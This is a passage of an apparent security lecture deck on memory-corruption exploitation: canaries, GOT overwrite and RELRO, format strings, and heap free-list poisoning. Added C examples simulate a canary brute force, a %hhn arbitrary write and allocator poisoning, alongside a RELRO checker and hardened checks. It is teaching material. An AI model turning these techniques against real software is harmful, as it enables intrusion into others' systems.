  [...] [...] [0x4141414141414141] [0x4141414141414141] [0x00007FFFDEADC0DE]

What the compiler effectively emits:
  void vuln() {
      push_cookie();            /* copy the secret into the frame */
      long local1;
      char buf[12];
      fgets(buf, 128, stdin);
      check_cookie();           /* compare with the secret; abort on mismatch */
  }
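The forking-server weakness in practice, as an added example that is not part of the deck: the server side is simulated by a function that lays out buf followed by the canary and "aborts" on mismatch, and the attacker side extends the overflow one byte per request. The secret 0x1122334455667700 is a constructed value (with the glibc-style zero low byte); nothing here talks to a real process.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* --- Simulated forking server. The canary is chosen once, when the parent
 * starts; every forked child inherits it unchanged. Lowest byte is 0x00 as on
 * x86-64 glibc. Constructed secret for the example, not a real value. */
static const uint64_t SERVER_CANARY = 0x1122334455667700ULL;

/* One child handling one request. Layout: buf[16] followed by the canary.
 * Returns 1 if the child returns normally, 0 if the canary check aborts it
 * (the attacker sees the difference as a closed connection or a crash). */
int child_handle_request(const uint8_t *data, size_t len) {
    uint8_t frame[16 + 8];
    memcpy(frame + 16, &SERVER_CANARY, 8);       /* push_cookie() */
    if (len > sizeof frame) len = sizeof frame;
    memcpy(frame, data, len);                    /* the overflow: no bounds check */
    return memcmp(frame + 16, &SERVER_CANARY, 8) == 0;   /* check_cookie() */
}

/* --- Attacker. Lengthen the overflow by one byte at a time: a guess that
 * matches the next canary byte leaves the check intact and the child lives.
 * At most 256 requests per byte, 8 * 256 in total, instead of 2^64 guesses
 * for the whole value. Returns requests used, or -1 if a byte never matched. */
long brute_force_canary(uint64_t *recovered) {
    uint8_t req[16 + 8];
    memset(req, 'A', 16);
    long tries = 0;
    for (int i = 0; i < 8; i++) {
        int found = 0;
        for (int b = 0; b < 256; b++) {
            req[16 + i] = (uint8_t)b;
            tries++;
            if (child_handle_request(req, 16 + i + 1)) { found = 1; break; }
        }
        if (!found) return -1;
    }
    memcpy(recovered, req + 16, 8);   /* same byte order as in memory */
    return tries;
}

uint64_t demo_recovered_canary(void) {
    uint64_t c = 0;
    return brute_force_canary(&c) < 0 ? 0 : c;
}

long demo_requests_needed(void) {
    uint64_t c = 0;
    return brute_force_canary(&c);
}

/* The payoff: a full overflow that replays the recovered canary passes the
 * check, so the saved base pointer and return address are reachable again. */
int demo_full_overflow_survives(void) {
    uint64_t c = demo_recovered_canary();
    uint8_t req[16 + 8];
    memset(req, 'A', 16);
    memcpy(req + 16, &c, 8);
    return child_handle_request(req, sizeof req);
}

int main(void) {
    printf("canary 0x%016llx recovered in %ld requests, replay ok=%d\n",
           (unsigned long long)demo_recovered_canary(), demo_requests_needed(),
           demo_full_overflow_survives());
    return 0;
}
```

The attack depends entirely on the secret staying fixed between crashes. A server that re-executes (rather than forks) per connection gets a fresh canary each time, and the byte-at-a-time oracle no longer accumulates information.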
21. GOT/PLT Overwrite
● Procedure Linkage Table, PLT
● Global Offset Table, GOT
● PLT contains stubs with jumps through the GOT
● GOT contains addresses of (lazily resolved) library functions
● Overwrite GOT entry and call function: any later call through the PLT now lands on the attacker's address. The overwrite needs a write primitive, e.g. a format string %n or heap corruption (see below)

  ... call printf@plt ...
  printf@plt: jmp [printf@got]
  printf@got: 0x7FFFC0DECAFE        (resolved libc address)

  after the overwrite:
  printf@got: 0x7FFFDEADDEAD
  … call printf@plt -> 0x7FFFDEADDEAD ...
22. Protection: RELRO
● RELocation Read Only, RELRO
● "Partial RELRO" (linker flag -z relro)
○ GOT before BSS: sections are reordered so a .bss overflow cannot reach the GOT, and .init_array, .fini_array and .dynamic become read-only, but .got.plt stays writable because functions are still resolved lazily
● Full RELRO (-z relro -z now)
○ Actually Read Only: every symbol is resolved at load time and the whole GOT is then remapped read-only
○ Handled by loader (ld.so), at a start-up cost

  ... call printf@plt ...
  printf@plt: jmp [printf@got]
  printf@got: 0x7FFFC0DECAFE

  writing printf@got: 0x7FFFDEADDEAD now faults, so
  … call printf@plt -> 0x7FFFC0DECAFE ...
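A check a practitioner wants for the two slides above, as an added example that is not part of the deck: a small ELF64 reader that classifies a binary's RELRO level (none, partial, full) from its program headers and dynamic section, which is what checksec reports, with every header offset range-checked so a crafted file cannot drive it out of bounds. The constants are the standard ELF values; the two sample images it builds are constructed headers, not real binaries.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ELF64 constants (standard values, as in glibc's elf.h), defined locally so
 * the example builds without <elf.h>. */
#define PT_LOAD      1
#define PT_DYNAMIC   2
#define PT_GNU_RELRO 0x6474e552u
#define DT_NULL      0
#define DT_BIND_NOW  24
#define DT_FLAGS     30
#define DT_FLAGS_1   0x6ffffffbu
#define DF_BIND_NOW  0x8
#define DF_1_NOW     0x1

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static uint64_t rd64(const uint8_t *p) { return (uint64_t)rd32(p) | (uint64_t)rd32(p + 4) << 32; }

/* Classify a little-endian ELF64 image held in memory.
 *   0 = no PT_GNU_RELRO: the GOT stays writable for the whole run
 *   1 = partial RELRO: PT_GNU_RELRO present, lazy binding keeps .got.plt writable
 *   2 = full RELRO: PT_GNU_RELRO plus BIND_NOW, whole GOT read-only after load
 *  -1 = not ELF64/LE, or a header offset runs past the end of the image */
int relro_level(const uint8_t *img, size_t len) {
    if (len < 64 || memcmp(img, "\x7f" "ELF", 4) != 0) return -1;
    if (img[4] != 2 || img[5] != 1) return -1;            /* ELFCLASS64, ELFDATA2LSB */
    uint64_t phoff = rd64(img + 32);
    uint16_t phentsize = rd16(img + 54), phnum = rd16(img + 56);
    if (phentsize < 56 || phoff > len) return -1;
    int has_relro = 0, bind_now = 0;
    uint64_t dyn_off = 0, dyn_size = 0;
    for (uint16_t i = 0; i < phnum; i++) {
        uint64_t off = phoff + (uint64_t)i * phentsize;
        if (off > len || len - off < 56) return -1;        /* program header out of bounds */
        uint32_t type = rd32(img + off);
        if (type == PT_GNU_RELRO) has_relro = 1;
        if (type == PT_DYNAMIC) { dyn_off = rd64(img + off + 8); dyn_size = rd64(img + off + 32); }
    }
    if (dyn_off > len) return -1;
    for (uint64_t done = 0; done + 16 <= dyn_size; done += 16) {   /* walk Elf64_Dyn entries */
        uint64_t off = dyn_off + done;
        if (off > len || len - off < 16) return -1;
        uint64_t tag = rd64(img + off), val = rd64(img + off + 8);
        if (tag == DT_NULL) break;
        if (tag == DT_BIND_NOW) bind_now = 1;
        if (tag == DT_FLAGS && (val & DF_BIND_NOW)) bind_now = 1;
        if (tag == DT_FLAGS_1 && (val & DF_1_NOW)) bind_now = 1;
    }
    if (!has_relro) return 0;
    return bind_now ? 2 : 1;
}

/* Same check on a file on disk, e.g. ./a.out; -1 if it cannot be read. */
int relro_level_file(const char *path) {
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    long sz = (fseek(f, 0, SEEK_END) == 0) ? ftell(f) : -1;
    uint8_t *buf = (sz > 0) ? malloc((size_t)sz) : NULL;
    int r = -1;
    if (buf && fseek(f, 0, SEEK_SET) == 0 && fread(buf, 1, (size_t)sz, f) == (size_t)sz)
        r = relro_level(buf, (size_t)sz);
    free(buf);
    fclose(f);
    return r;
}

static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static void wr64(uint8_t *p, uint64_t v) { for (int i = 0; i < 8; i++) p[i] = (uint8_t)(v >> (8 * i)); }

#define SAMPLE_LEN 208   /* 64-byte ELF header + 2 * 56-byte phdrs + 2 * 16-byte dyn entries */

/* Constructed sample image (headers only, no code): enough for the checker. */
size_t make_sample_elf(uint8_t *out, int with_relro, int with_bind_now) {
    memset(out, 0, SAMPLE_LEN);
    memcpy(out, "\x7f" "ELF", 4); out[4] = 2; out[5] = 1; out[6] = 1;   /* 64-bit, LE, version 1 */
    wr16(out + 16, 3); wr16(out + 18, 62); wr32(out + 20, 1);            /* ET_DYN, EM_X86_64, EV_CURRENT */
    wr64(out + 32, 64);                                                 /* e_phoff */
    wr16(out + 52, 64); wr16(out + 54, 56); wr16(out + 56, 2);           /* e_ehsize, e_phentsize, e_phnum */
    uint8_t *ph = out + 64;                                             /* PT_DYNAMIC at offset 176, 32 bytes */
    wr32(ph, PT_DYNAMIC); wr64(ph + 8, 176); wr64(ph + 32, 32); wr64(ph + 40, 32);
    wr32(ph + 56, with_relro ? PT_GNU_RELRO : PT_LOAD);                 /* second phdr */
    uint8_t *dyn = out + 176;
    wr64(dyn, DT_FLAGS); wr64(dyn + 8, with_bind_now ? DF_BIND_NOW : 0);
    wr64(dyn + 16, DT_NULL);
    return SAMPLE_LEN;
}

int demo_classify(int with_relro, int with_bind_now) {
    uint8_t img[SAMPLE_LEN];
    return relro_level(img, make_sample_elf(img, with_relro, with_bind_now));
}

/* An image cut off inside the program headers must be rejected, not misread. */
int demo_truncated(void) {
    uint8_t img[SAMPLE_LEN];
    make_sample_elf(img, 1, 1);
    return relro_level(img, 100);
}

int main(int argc, char **argv) {
    if (argc > 1) { printf("%s: RELRO level %d\n", argv[1], relro_level_file(argv[1])); return 0; }
    printf("none=%d partial=%d full=%d truncated=%d\n",
           demo_classify(0, 0), demo_classify(1, 0), demo_classify(1, 1), demo_truncated());
    return 0;
}
```

Run it with a path to see what a real binary was linked with; a level below 2 means a GOT overwrite is still on the table and lazy binding is in play.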
23. Base Pointer Overwrite
● Stack frames - linked list: each saved base pointer points at the caller's frame
● Misalign stack frame by overwriting the saved base pointer
○ Modify local variables: after the return, the caller addresses its locals relative to attacker-chosen memory
○ Modify stack pointer: the caller's leave/ret moves rsp to the fake frame
● Partial overwrite (lowest byte only)
○ Shift stack frame by a small amount without knowing the full address, which matters under ASLR

24. Protection: CFG
● Control Flow Guard (Windows)
● Control Flow Integrity (e.g. clang -fsanitize=cfi)
● Intended to prevent code-reuse attacks by checking indirect branch targets against the set of valid ones
● Bypass example: JIT (code generated at runtime from attacker-influenced input is not covered by the compile-time checks)

25. Protection: PAC
● Pointer Authentication Code
● Reuse unused (high) bits of a pointer for a MAC over the pointer and a context
● Hardware support
● ARM64 (ARMv8.3-A), Apple iOS
● Bypass: signing oracle - get code that holds the key to sign an attacker-chosen pointer
○ Project Zero blog
26. Format String Vulnerability
● Calls to printf-like functions
● Control over first argument (the format string)
● Variable number of arguments: printf trusts the format to say how many there are and pulls "missing" ones from registers and the stack
● Read direct: %x/%d (dumps argument registers and stack words)
● Read indirect: %s (treats the argument as a pointer and reads the string behind it)
● Write: %n (stores the number of characters printed so far through the argument pointer)
● Copy: %0*x, %n (pad to a chosen width, then store that count: an arbitrary value write)
● Skip: %4$x (positional selection, reaches the fourth argument directly)

  int printf ( const char * format, ... );
  printf("Name: %s, age: %d", name, age); // Ok
  printf(name); // Vulnerable

The fix is to pass a literal format and name as an argument ("%s"); gcc and clang flag the vulnerable form with -Wformat-security.
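The "Copy" bullet carried through, as an added example that is not part of the deck: the format string below is what an attacker would send as name, but it is called here with explicit arguments so the effect is deterministic. Each %*c pads the output until the character count, modulo 256, equals the wanted byte, and the following %hhn stores that byte through the next pointer; four rounds write a whole 4-byte value. It assumes a little-endian target (x86), since the bytes are written in the order the value is stored in memory.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Turn printf's %n into a 4-byte write to *target (little-endian host assumed).
 * Returns the number of characters printf produced, i.e. the final %n counter. */
int format_string_write32(uint32_t value, uint32_t *target) {
    signed char *p = (signed char *)target;   /* %hhn writes through a char pointer */
    int width[4];
    unsigned printed = 0;
    for (int i = 0; i < 4; i++) {
        unsigned want = (value >> (8 * i)) & 0xff;      /* byte i of the value */
        unsigned pad  = (want - printed) & 0xff;         /* chars still needed, mod 256 */
        if (pad == 0) pad = 256;                         /* %c prints at least one char */
        width[i] = (int)pad;
        printed = (printed + pad) & 0xff;
    }
    /* Worst case is four 256-character pads; the buffer is large enough that
     * nothing is truncated, so each %n sees the exact count. In the real attack
     * this literal is the attacker's "name" and the pointers are whatever sits
     * in the argument slots printf reads. */
    char out[4 * 256 + 1];
    return snprintf(out, sizeof out, "%*c%hhn%*c%hhn%*c%hhn%*c%hhn",
                    width[0], 'A', p + 0, width[1], 'A', p + 1,
                    width[2], 'A', p + 2, width[3], 'A', p + 3);
}

/* Runs the write on a fresh target and returns what landed there. */
uint32_t demo_fmt_write(uint32_t value) {
    uint32_t target = 0;
    format_string_write32(value, &target);
    return target;
}

/* How many characters the write "prints": the cost of the technique. */
int demo_fmt_chars_printed(uint32_t value) {
    uint32_t target = 0;
    return format_string_write32(value, &target);
}

int main(void) {
    printf("wrote 0x%08x using %d output characters\n",
           (unsigned)demo_fmt_write(0xDEADBEEFu), demo_fmt_chars_printed(0xDEADBEEFu));
    return 0;
}
```

Writing a byte at a time is what keeps the padding small: a single %n for 0xDEADBEEF would need over three billion characters of output, while four %hhn writes need at most 1024.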
28. A Refresher on Memory
● Physical
● Virtual
● Pages
● Memory allocator
○ malloc/free
○ glibc (ptmalloc)
○ jemalloc

29. Heap corruption: app layer
● Heap overflow
● Use after free
● Type confusion
● Heap spraying

30. Heap corruption: allocator
● Corrupt allocator metadata
● Linked lists: free chunks are chained through pointers stored in the chunks themselves, so a corrupted "next" pointer makes malloc hand out an attacker-chosen address
● Requires understanding of allocator
○ Slabs
○ Bins
○ Cache (glibc's per-thread tcache)
● glibc - House of X (named techniques, each tied to particular glibc versions and their checks)
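The free-list corruption the slide refers to, as an added example that is not part of the deck, on a toy allocator written for this page rather than glibc: chunk B is freed, a heap overflow from the neighbouring chunk A overwrites B's next pointer with the address of a fake chunk, and two allocations later malloc returns a pointer into that fake chunk. The arena, chunk size, the victim struct and the "checked" variant's integrity test are all made up for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy allocator: CHUNK-byte chunks in a static arena. The first HDR bytes of
 * a chunk are metadata: while the chunk is free they hold 'fd', the pointer
 * to the next free chunk (a singly linked free list, like a glibc fastbin or
 * tcache entry). The caller gets the CHUNK - HDR bytes after the header. */
#define CHUNK  32
#define NCHUNK 8
#define HDR    8
static uint8_t arena[CHUNK * NCHUNK];
static void   *free_head;    /* head of the free list */
static size_t  top;          /* index of the next never-used chunk */

void toy_reset(void) { memset(arena, 0, sizeof arena); free_head = NULL; top = 0; }

void *toy_malloc(void) {
    if (free_head) {                                    /* reuse a freed chunk */
        uint8_t *chunk = free_head;
        memcpy(&free_head, chunk, sizeof free_head);    /* head = chunk->fd, unchecked */
        return chunk + HDR;
    }
    if (top >= NCHUNK) return NULL;
    return arena + (top++) * CHUNK + HDR;
}

void toy_free(void *p) {
    uint8_t *chunk = (uint8_t *)p - HDR;
    memcpy(chunk, &free_head, sizeof free_head);       /* chunk->fd = old head */
    free_head = chunk;
}

/* Hardened variant: refuse a free-list pointer that is not a chunk inside the
 * arena (glibc has its own integrity checks, e.g. safe-linking and tcache
 * double-free detection). Returns NULL instead of a bogus pointer. */
void *toy_malloc_checked(void) {
    if (free_head) {
        uintptr_t c = (uintptr_t)free_head, lo = (uintptr_t)arena;
        if (c < lo || c >= lo + sizeof arena || (c - lo) % CHUNK != 0)
            return NULL;                                /* corrupted metadata */
        uint8_t *chunk = free_head;
        memcpy(&free_head, chunk, sizeof free_head);
        return chunk + HDR;
    }
    if (top >= NCHUNK) return NULL;
    return arena + (top++) * CHUNK + HDR;
}

/* Something the attacker wants malloc to hand back: a fake chunk whose data
 * field stands in for a GOT slot or a function pointer. */
struct fake_chunk { uint64_t header; uint64_t value; };
struct fake_chunk victim;

/* Overflow chunk A (allocated) into chunk B (free): B's fd becomes &victim. */
static void corrupt_free_list(void) {
    toy_reset();
    uint8_t *a = toy_malloc();         /* chunk 0, CHUNK - HDR usable bytes */
    uint8_t *b = toy_malloc();         /* chunk 1, directly after A */
    toy_free(b);                       /* free list: B -> NULL */
    uint8_t payload[CHUNK];            /* CHUNK bytes into a CHUNK - HDR allocation */
    memset(payload, 'A', CHUNK - HDR);
    void *target = &victim;
    memcpy(payload + CHUNK - HDR, &target, sizeof target);   /* lands on B->fd */
    memcpy(a, payload, sizeof payload);   /* the bug: no bounds check */
}

/* Returns what the second allocation after the corruption yields: &victim.value. */
void *demo_fd_poison(void) {
    corrupt_free_list();
    (void)toy_malloc();                /* returns B; free list head is now &victim */
    return toy_malloc();               /* returns (uint8_t *)&victim + HDR */
}

/* The payoff: an arbitrary write through the poisoned allocation. */
uint64_t demo_poisoned_write(void) {
    victim.value = 0;
    uint64_t *p = demo_fd_poison();
    *p = 0xDEADBEEFCAFEBABEULL;
    return victim.value;
}

/* With the integrity check, the corrupted entry is rejected. */
void *demo_fd_poison_checked(void) {
    corrupt_free_list();
    (void)toy_malloc_checked();        /* B itself is a valid chunk */
    return toy_malloc_checked();       /* &victim is outside the arena: NULL */
}

int main(void) {
    printf("poisoned malloc -> %p (victim.value at %p)\n", demo_fd_poison(), (void *)&victim.value);
    printf("write via poisoned chunk: 0x%016llx\n", (unsigned long long)demo_poisoned_write());
    printf("checked allocator: %p\n", demo_fd_poison_checked());
    return 0;
}
```

The same shape appears in real allocators under different names (fastbin dup, tcache poisoning): the attacker never touches the allocator's code, only the metadata it trusts, which is why the how2heap material linked below is organised by glibc version and by which check each technique has to satisfy.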
32. Want to try it out?
Capture the Flag: https://capturetheflag.withgoogle.com, https://ctftime.org, https://picoctf.com
Wargames: https://github.com/zardus/wargame-nexus, https://pwnable.kr, https://overthewire.org
Community: CTF players Discord: https://discord.gg/ArjWjvctft

33. Further Materials
Videos: https://securitycreators.video, https://www.youtube.com/GynvaelEN, https://www.youtube.com/ZetaTwo, https://www.youtube.com/LiveOverflow
Tools: Python + Pwntools, gdb + gef, IDA, Binary Ninja, Ghidra
Learning: https://pwn.college, https://github.com/RPISEC/MBE, https://github.com/shellphish/how2heap

34. Interested in Google?
Internships and full-time positions: https://careers.google.com/students
Questions about working at Google, specifically security: Email zetatwo@google.com or Twitter @zetatwo